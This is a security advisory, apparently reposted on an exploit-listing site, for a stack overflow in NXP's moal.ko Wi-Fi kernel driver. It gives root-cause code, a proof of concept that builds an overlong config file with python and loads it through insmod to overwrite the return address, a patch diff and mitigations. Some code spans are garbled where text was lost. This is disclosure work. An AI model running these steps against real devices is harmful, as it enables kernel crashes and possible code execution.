## https://sploitus.com/exploit?id=90E9817C-EB37-5B54-B408-86D73C806716
# CVE-2025-29338 โ Security Advisory
## Buffer Overflow in NXP moal.ko Wi-Fi Kernel Driver (`woal_setup_module_param` / `parse_cfg_get_line`)
| Field | Value |
|---|---|
| **CVE ID** | CVE-2025-29338 |
| **Severity** | High |
| **CVSS v3.1 Score** | 7.8 |
| **CVSS v3.1 Vector** | `CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` |
| **Vulnerability Type** | Stack-Based Buffer Overflow (CWE-121) |
| **Attack Vector** | Local |
| **Vendor** | NXP Semiconductors |
| **Vendor Patch Status** | Patched |
| **Discoverer** | Mahmoud Jadaan โ diconium auto GmbH |
---
## Summary
A stack-based buffer overflow vulnerability exists in the NXP **moal.ko** Wi-Fi kernel driver (version 5.1.7.10) across firmware builds `v17.92.1.p149.43` through `v17.92.1.p149.157`. The vulnerability is located in `parse_cfg_get_line` (`mlinux/moal_init.c`), called from `woal_setup_module_param`. The while loop that reads configuration file lines into a fixed-size stack buffer lacks a destination bounds check, allowing a line of arbitrary length to overflow the buffer, corrupt the stack, and trigger a kernel panic. NXP PSIRT confirmed the vulnerability and the fix has been released.
---
## Affected Products
| Field | Detail |
|---|---|
| **Vendor** | NXP Semiconductors |
| **Component** | moal.ko Wi-Fi kernel driver |
| **Driver Version** | 5.1.7.10 |
| **Firmware โ First Affected** | v17.92.1.p149.43 |
| **Firmware โ Last Affected** | v17.92.1.p149.157 |
---
## Vulnerability Details
### Root Cause
`woal_setup_module_param` allocates a fixed stack buffer of `MAX_LINE_LEN` bytes and passes it to `parse_cfg_get_line` on each iteration while processing the `mod_para` configuration file:
```c
// woal_setup_module_param โ mlinux/moal_init.c
char line[MAX_LINE_LEN];
...
while (parse_cfg_get_line(data, size, line) != -1) {
// process line
}
```
In the vulnerable revision of `parse_cfg_get_line`, the while loop condition checks only the source position and line terminators โ there is **no check on how many bytes have been written to the destination buffer**:
```c
// parse_cfg_get_line โ vulnerable version (mlinux/moal_init.c)
static t_size parse_cfg_get_line(t_u8 *data, t_size size, t_u8 *line_pos)
{
t_u8 *src, *dest;
static t_s32 pos;
if (pos >= size) {
pos = 0;
return -1;
}
memset(line_pos, 0, MAX_LINE_LEN);
src = data + pos;
dest = line_pos;
while (pos Provided for defensive and research purposes only.
### Step 1 โ Unload existing modules
```sh
#!/bin/sh
rmmod moal
rmmod mlan
```
### Step 2 โ Create the malicious configuration file
The stack buffer is filled with `A`s, followed by 8 bytes for the stack canary slot (`B`s), 8 bytes for the saved `rbp` (`C`s), and 8 bytes to overwrite the return address (`D`s):
```sh
python3 -c 'print("A"*256 + "B"*8 + "C"*8 + "D"*8)' > payload.bin
```
### Step 3 โ Load the module with the crafted config
The `mod_para` path must be **relative to the directory where the kernel searches for firmware** (typically `/lib/firmware/`). Construct the path accordingly:
```sh
#!/bin/sh
PAYLOAD_PATH=../..//payload.bin
insmod /lib/modules/nxp9098/wifi/mlan.ko
insmod /lib/modules/nxp9098/wifi/moal.ko \
mod_para=$PAYLOAD_PATH \
drvdbg=0x7
```
### Step 4 โ Observed result
A kernel panic is triggered immediately during module initialization. Kernel logs confirm the return address is overwritten with `0x4444444444444444` (ASCII `DDDDDDDD`), demonstrating full control of the instruction pointer:
```
[insmod] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in:
woal_setup_module_param+0xd4/0x3e4 [moal]
[insmod] 0x4444444444444444 = (MAX_LINE_LEN-1)) {
+ PRINTM(MERROR, "input data size exceeds the dest buff limit\n");
+ break;
+ }
}
/* parse new line */
pos++;
```
---
## Mitigation
Update to a firmware version beyond v17.92.1.p149.157 which includes the patch above. As additional hardening:
1. **Restrict module loading** โ limit `CAP_SYS_MODULE` to trusted administrators; enforce `init_module` / `finit_module` syscall restrictions via SELinux, AppArmor, or `seccomp`.
2. **Protect configuration file paths** โ ensure the path referenced by `mod_para` and the files it points to are only writable by root.
---
## References
- **NXP mwifiex Driver (GPL):** https://github.com/nxp-imx/mwifiex
- **NXP Release Notes:** https://www.nxp.com/docs/en/release-note/RN00104.pdf
---
## Vendor Status
NXP PSIRT confirmed the vulnerability. The fix has been released as part of a formal software update.
---
## Credits
**Discoverer:** Mahmoud Jadaan โ diconium auto GmbH
---
*This advisory is published as a public reference to satisfy minimum CVE disclosure requirements per the CVE Program.*